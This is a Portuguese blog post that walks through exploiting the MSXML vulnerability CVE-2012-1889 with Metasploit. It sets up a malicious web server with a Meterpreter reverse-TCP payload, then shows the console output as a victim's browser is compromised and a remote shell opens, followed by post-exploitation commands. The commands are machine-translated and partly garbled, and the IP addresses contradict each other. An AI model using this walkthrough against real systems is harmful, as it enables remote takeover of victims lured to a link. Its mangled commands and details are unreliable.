terça-feira, 15 de janeiro de 2013

Microsoft XML Core Services Vulnerabilidade Metasploit Demonstração

CVE-2012-1889: Microsoft XML Core Services Vulnerabilidade
Uma vulnerabilidade no Microsoft XML Core Services 3.0, 4.0, 5.0 e 6.0 permite a execução remota de código se um usuário visualiza uma página web especialmente criada usando o Internet Explorer.

Um invasor não teria como forçar os usuários a visitar um site deste tipo. Em vez disso, o invasor teria que convencer os usuários a visitar o site, geralmente fazendo com que eles cliquem em um link em uma mensagem de e-mail ou mensagens instantâneas, que os leva para o site do atacante.

A vulnerabilidade afeta todas as versões suportadas do Microsoft Windows, e todas as edições com suporte do Microsoft Office 2003 e Microsoft Office 2007. Aqui você pode a lista completa.

A vulnerabilidade existe quando MSXML tenta acessar um objeto na memória que não foi inicializado, o que pode corromper a memória de tal maneira que um invasor executar um código arbitrário no contexto do usuário conectado.
Vou demonstrar como usar a ferramenta Metasploit para testar se sua rede vulnerável ou não.

Abra o Terminal e digite "msfupdate" para obter as últimas módulos Metasploit. Quando a atualização for concluída, em seguida, digite "msfconsole".

Em seguida, digite o seguinte comando no console "uso explorar / windows / navegador / msxml_get_definition_code_exec".

Agora, temos de saber a lista de configurações disponíveis para este módulo de exploração. A fim de obter a lista, você pode digitar "mostrar opções" no console.

Comando: SRVHOST conjunto 192.168.56.10
Detalhes: Aqui o 192.168.56.11 é o IP do Backtrack. Você pode obter este ip, basta digitar o "ifconfig" no terminal.

Comando: lhost conjunto 192.168.56.10

Comando: URIPATH set /
Detalhes: O caminho em que a nossa exploração será executado.

Como de costume, nós podemos usar carga TCP reversa para este ataque também. Então digite o seguinte comando no console do Metasploit:
definir payload windows / Meterpreter / reverse_tcp

Digite "proeza" no console.


Uma vez que a vítima carrega o URL em seu navegador IE, você receberá a seguinte mensagem em seu console metasploit:

[*] Msxml_get_definition_code_exec - Usando msvcrt ROP

[*] Msxml_get_definition_code_exec - 10.0.1.79:1564 - Enviando html

[*] Envio de estágio (752.128 bytes) para 192.168.56.12

[*] Meterpreter uma sessão aberta (192.168.56.10:4444 -> 192.168.56.12:1565)

Digite "sessões" para listar as sessões ativas. Tipo "sessões-i 1", isto irá abrir a conexão com a sessão com o '1 id 'e trazê-lo para Meterpreter.

Digite "sysinfo" no Meterpreter para obter as informações do sistema.
← Postagem mais recente Postagem mais antiga → Página inicial

0 comentários:

Postar um comentário

Copyright © Hacking & Security | Powered by Xandao Design by Xandao86 | Xandao86